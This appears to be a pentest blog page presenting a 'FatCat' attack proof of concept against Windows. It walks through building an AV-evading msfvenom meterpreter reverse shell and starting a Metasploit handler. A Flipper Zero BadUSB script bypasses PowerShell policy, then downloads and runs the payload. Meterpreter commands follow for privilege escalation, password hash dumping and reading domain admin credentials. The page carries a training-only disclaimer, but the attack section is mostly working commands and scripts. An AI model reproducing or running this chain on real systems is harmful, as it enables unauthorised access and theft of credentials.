{{tag>english blog it-security pentest}} ====== FatCat Attack PoC ====== _____ _ ____ _ | ___|_ _| |_ / ___|__ _| |_ | |_ / _` | __| | / _` | __| | _| (_| | |_| |__| (_| | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC | @orange:This PoC is for demonstration and training purposes only - misuse is prohibited. strafbar((https://dejure.org/gesetze/StGB/202a.html)) | ===== Description ===== The objective is to extract relevant SAM data from the registry. For this purpose, the flipper is used as a BadUSB device. The PowerShell Execution Policy is to be bypassed and the required rights are to be secured with a privilege escalation. The following data is to be exfiltrated: ^ User ^ Password ^ Hash ^ | Host \ User | | | | Host \ Admin | | | | Domain \ Admin | | | \\ \\ ===== Procedure ===== - Deactivate AV - Create payload - Start handler - BadUSB attack - Use RemoteShell to explore - Search for exploit - Apply exploit - Collect credentials \\ \\ ===== Documentation ===== ^ Attack Chain Step ^ Attack Technique ^ Attack Tool ^ | @#D0FA58:**Weaponisation** | Exploit, Payload | msfvenom((https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom)) | | @#FACC2E:**Delivery** | Physical access, Injection | Flipper((https://flipperzero.one/)), BadUSB((https://grantonline.medium.com/flipper-zero-badusb-getting-started-with-duckyscript-f212fcdd5dec)) | |::: | Bypass | PowerShell Restrictions((https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)) | | @#2E9AFE:**Exploitation** | Reverse Shell | Metasploit((https://www.hackers-arise.com/post/2017/07/31/metasploit-basics-part-9-using-msfvenom-to-create-custom-payloads)) | |::: | Enumeration | **Enumerate System Info** JAWS((https://github.com/411Hall/JAWS)), SessionGopher((https://github.com/Arvanaghi/SessionGopher)), weak Service Permissions((https://fuzzysecurity.com/tutorials/16.html)), Primary Access Token Manipulation((https://www.ired.team/offensive-security/privilege-escalation/t1134-access-token-manipulation)), Unquoted Service Path ((https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths)), PassTheHash ((https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/README.md)) ((https://www.ired.team/offensive-security/privilege-escalation/pass-the-hash-privilege-escalation-with-invoke-wmiexec)), BetterSafetyKatz (Builds local, obfuscating not complete), Search for local Exploits((https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/)) | |::: | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives** | Exfiltration | Exfiltrate Data | \\ \\ ===== Preparations and attack ===== ==== Metasploit payload ==== * Start Metasploit * Open cmd cmd * Generate payload msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=50666 -e x86/shikata_ga_nai -i 5 -f exe > msfpayload.exe * Exit shell exit * Store payload on a web server \\ [{{it-security:blog:002-fc-msfvenom.png?400|Generate payload}}] \\ ==== Metasploit Handler ==== * Start Multi Handler Server use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPORT 50666 exploit \\ [{{it-security:blog:001-fc-handler.png?400|Configure and start Metasploit Handler}}] \\ ==== Access to the target system ==== * With the pinball machine, the following script is executed on the target system WINDOWS r DELAY 2000 STRING powershell.exe DELAY 3000 ENTER DELAY 5000 STRING Set-ExecutionPolicy Bypass -Scope Process -force DELAY 3000 ENTER DELAY 3000 STRING irm https:///msfpayload.exe -OutFile msfpayload.exe DELAY 3000 ENTER DELAY 5000 STRING Start-Process msfpayload.exe DELAY 3000 ENTER DELAY 3000 STRING exit DELAY 1500 ENTER \\ [{{it-security:blog:003-fc-flipperattack.png?400|Flipper attack is executed}}] \\ ==== Connection established - Metasploit does it ==== getsystem hashdump ls getwd cd c: cd Glob_Share ls background use post/multi/recon/local_exploit_suggester sessions set session 1 run use exploit/windows/local/always_install_elevated set session 1 exploit cd glob_share type Domain-Admin-Creds.txt hashdump sessions -i 1 [{{it-security:blog:004-fc-session.png?400|Meterpreter Session produced}}] [{{it-security:blog:005-fc-exploitsearch.png?400|Automated Exploit Search for Privilege Escalation}}] [{{it-security:blog:006-fc-privesc.png?400|Privilege Escalation successful}}] [{{it-security:blog:007-fc-creds.png?400|Here are our searched credentials}}]